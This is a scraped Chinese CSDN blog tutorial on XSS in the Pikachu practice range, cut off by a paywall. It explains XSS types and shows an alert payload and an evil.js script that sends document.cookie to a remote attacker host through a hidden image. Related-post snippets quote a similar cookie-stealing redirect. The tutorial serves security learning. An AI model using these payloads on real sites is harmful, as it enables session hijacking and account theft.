XSS解析——pikachu靶场

已于 2022-05-11 11:13:39 修改
阅读量1.2k 收藏 4
点赞数 2
文章标签: xss 前端
于 2022-05-10 21:54:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aquarius_ego/article/details/124694512
版权
本文详细介绍了XSS漏洞的原因、分类和危害,重点讨论了反射型XSS和存储型XSS的攻击方式,包括劫持用户COOKIE、框架钓鱼、挂马和键盘记录等。通过实例展示了如何在Pikachu靶场上实践这些攻击,强调了防止XSS攻击的重要性。
摘要由CSDN通过智能技术生成

XSS漏洞出现的原因

       程序对输入和输出控制不够严格,导致恶意构造的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行而产生危害

XSS分类

反射型XSS

储存性XSS

DOM型XSS

XSS的危害

劫持用户COOKIE

Cookie是用户对于特定网站的身份验证标志。XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。

反射型XSS(get)

首先,试试直接获取本地的cookie

先修改字符长度的限制

然后输入

<script>alert(document.cookie)</script>

就能获取cookie

利用这个原理可以尝试截取其他用户的cookie

方法一:

提前在攻击机上写好js代码evil.js

var img=document.createElement("img");
img.src="http://192.168.111.130/log?"+escape(document.cookie);
document.body.appendChild(img);

这段代码在页面中插入了一张看不见的图片,同时把 document.cookie 对象作为参数发送到远程服务器,这样,就完成了一个简单的窃取 Cookie 的 XSS Payload

 构造payload


                

        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  Aquarius_ego
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
linux-kali利用BeEF 执行 XSS 攻击

				
			

			

				

					LCH14777475118的博客
				

				

					06-26
					
					345
					
				

			

		

		

			
				
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。

			
		

	



                

            
              



	

		

			

				
					
攻防系列——pikachu靶场通关练习

				
			

			

				

					weixin_43140411的博客
				

				

					10-23
					
					2138
					
				

			

		

		

			
				
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基

			
		

	



              


  
              

                


	

		

			

				
					
Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录

				
			

			

				

					m0_74608722的博客
				

				

					08-17
					
					1235
					
				

			

		

		

			
				
我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。首先我们登录进去,我们发现界面和get的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post的,请求是通过post的方式发送的。**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!

			
		

	





	

		

			

				
					
PIKACHU | PIKACHU 靶场 XSS 后台配置

					
最新发布

				
			

			

				

					Blue17 の 小窝
				

				

					09-30
					
					1044
					
				

			

		

		

			
				
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。

			
		

	



		

			
		



	

		

			

				
					
使用pikachu管理工具下的XSS后台进行实战

				
			

			

				

					北冥同学的成长记录笔记
				

				

					07-29
					
					3818
					
				

			

		

		

			
				
pikachu管理工具下的XSS后台是一个通过Cookie窃取和利用、钓鱼攻击、键盘行为记录这三个实战实验来帮助学习者理解XSS漏洞的原理和危害的一个平台。旨在帮助学习者在实战中深入理解理论,从而可以更好的防御XSS漏洞。

			
		

	





	

		

			

				
					
Pikachu-xss

				
			

			

				

					m0_71518346的博客
				

				

					12-08
					
					755
					
				

			

		

		

			
				
alert("xss")点击提交出现一段文字应该是直接打到后台了,找到后台,登录进去看看,后台地址是/xssblind/admin_login.php登录即可触发xss。x'alert('xss') 使用单引号闭合$mc,再由闭合script标签,而后构造script标签,写入alert弹窗,成功弹出。直接在输入框输入alert("xss")

			
		

	





	

		

			

				
					
pikachu靶场反射XSScookie盗取

				
			

			

				

					weixin_45705209的博客
				

				

					08-20
					
					2043
					
				

			

		

		

			
				
反射XSS
尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。
利用漏洞获取cookie实例操作
这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo

			
		

	





	

		

			

				
					
XSS漏洞——渗透day08

				
			

			

				

					qq_62716256的博客
				

				

					09-04
					
					612
					
				

			

		

		

			
				
XSS漏洞——渗透day08

			
		

	





	

		

			

				
					
pikachu靶场练习通关加知识点总结

				
			

			

				

					qq_45584159的博客
				

				

					12-11
					
					7896
					
				

			

		

		

			
				
pikachu靶场练习
文章目录pikachu靶场练习前言一.暴力破解1.1 基于表单的暴力破解1.2验证码绕过(on sever)1.3验证码绕过(on client)1.4tokon防爆破二、xssxss概述DOM:文档对象类xss形成的原因:xss漏洞的测试流程:1.1反射xss(get)1.2反射xss(post)三.CSRF四.SQL注入五.RCE六.文件包含七.不安全的文件下载八.越权九.目录遍历十.敏感信息泄露十一,PHP反序列化十二.XXE十三.重定向十四.SSRF十五.管理工具




			
		

	





	

		

			

				
					
Pikachu靶场——文件上传漏洞_pikachu文件上传漏洞(1),网络安全开发避坑指南

				
			

			

				

					m0_60750088的博客
				

				

					04-18
					
					380
					
				

			

		

		

			
				
我们在这里查看浏览按钮,可以看出这里有一个对应的判断,当input标签去onchange,发生改变的时候,他就回去调用checkFileExt,我们可以把checkFileExt函数删掉,这和我们之前XSS漏洞的时候修改限制字数一样。这个PHP文件上传成功后,就和前面的一样,我们可以通过访问这个PHP文件,传参,通过一句话木马来控制服务器。上传一个正常的图片,去抓一下它的content-type,然后我们再去上传一下我们的一句话木马。进入第一关有一个文件上传的按钮,先看一下直接上传php文件是个什么效果。

			
		

	





	

		

			

				
					
Pikachu系列——XSS

				
			

			

				

					Zlirving_的博客
				

				

					05-13
					
					683
					
				

			

		

		

			
				
Pikachu靶场系列持续更新~
 
要像追剧追番一样追下去哦
 
实验二 —— XSS
XSS概述
Cross-Site Scripting 简称为“CSS”(跨站脚本攻击),为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:
1.反射XSS;
2.存储XSS;
3.DOMXSS;
DOMXSS、存储XSS反射XSS有啥不同?
反射:会经服务器处理,可在当前返回的数据包中发现XSS代码并显示在页面中;
存储:经服务器处理,存储在页

			
		

	





	

		

			

				
					
Pikachu-----Cross-Site Scripting(XSS

				
			

			

				

					m0_65712192的博客
				

				

					12-17
					
					953
					
				

			

		

		

			
				
Pikachu-----Cross-Site Scripting(XSS

			
		

	





	

		

			

				
					
pikachu漏洞练习平台XSS

				
			

			

				

					m0_55854679的博客
				

				

					05-09
					
					3915
					
				

			

		

		

			
				
XSS案例
get方式获取cookie图解

pkxss管理后台使用介绍

在绝对路径D:\phpstudy_pro\WWW\pikachu-master\pkxss下找到pkxss管理后台。

也可以点击,pikachu靶场的左侧漏洞栏最下面的管理工具下的xss后台,并进行初始化安装。


初始化安装后,输入页面提示的用户名和密码,即可成功进入pkxss管理后台。

get方式获取cookie方法

在目录D:\phpstudy_pro\WWW\pikachu-master\pkxss\xcookie下找

			
		

	





	

		

			

				
					
pikachu通关之XSS实操

				
			

			

				

					keeplearn10的博客
				

				

					08-09
					
					107
					
				

			

		

		

			
				
pikachu通关之xss

			
		

	





	

		

			

				
					
pikachu漏洞练习平台之xss(持续更新中)

				
			

			

				

					m0_55854679的博客
				

				

					05-04
					
					2142
					
				

			

		

		

			
				
概述
XSS(跨站脚本)
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:
1.反射XSS;
2.存储XSS;
3.DOMXSS;
XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie的获取,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等。
XSS是一种发生在web前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“

			
		

	





	

		

			

				
					
小皮中pikachuxss后台报错解决

				
			

			

				

					2302_76986722的博客
				

				

					09-13
					
					1817
					
				

			

		

		

			
				
初始化中会出现这样的报错:找不到数据库以及。

			
		

	





	

		

			

				
					
Pikachu第二弹:XSS

				
			

			

				

					Pisces_mango的博客
				

				

					08-14
					
					1752
					
				

			

		

		

			
				
一、反射xss(get)

1.输入语句,发现有长度限制,按F12,修改源码字符长度



2.输入语句



3.出现弹窗



二、反射xss(post)

1.输入账号密码登录



2.登录XSS后台,然后搭建恶意站点

这里是以POST的方式提交的,参数内容不会出现在URL中,这时候我们不能直接把我们的恶意代码嵌入到URL中,我们需要自己搭一个恶意站点,然后在网站上放一个post表单,将存放post表单的链接发送给受害者,诱导受害者点击这个post表单会自动向漏洞服务器提交一个POST请求,实

			
		

	





	

		

			

				
					
使用pikachu Xss后台出现的问题

				
			

			

				

					m0_74608722的博客
				

				

					06-01
					
					340
					
				

			

		

		

			
				
在进行xss-x漏洞实验的时候,一直出现上述错误,查找了很多,终于找到问题所在pikachu使用的数据库为同一个数据库,千万别被pkxss误导,以为pikachu还有一个数据库为pkxss,所以在配置的时候写下如下图的

			
		

	





	

		

			

				
					
pikachu靶场xss

				
			

			

				

					05-24
				

			

		

		

			
				
Pikachu 靶场是一款用于学习和测试 Web 安全漏洞的免费开源平台,其中包括了 XSS 攻击的相关漏洞。  首先,你需要在本地安装好 Pikcahu 靶场,然后进入靶场XSS 模块。在该模块中,你可以看到已经准备好的一些 XSS...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值